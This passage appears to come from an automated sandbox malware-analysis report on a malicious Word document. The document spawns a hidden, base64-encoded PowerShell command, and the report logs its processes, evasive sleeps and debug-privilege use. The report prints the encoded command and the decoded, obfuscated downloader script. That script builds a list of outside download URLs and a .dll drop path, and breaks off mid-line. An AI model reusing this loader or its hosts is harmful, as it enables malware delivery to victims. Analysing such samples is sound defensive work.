AnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK Jump to behavior

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2540 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2217476466.0000000000394000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b' Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
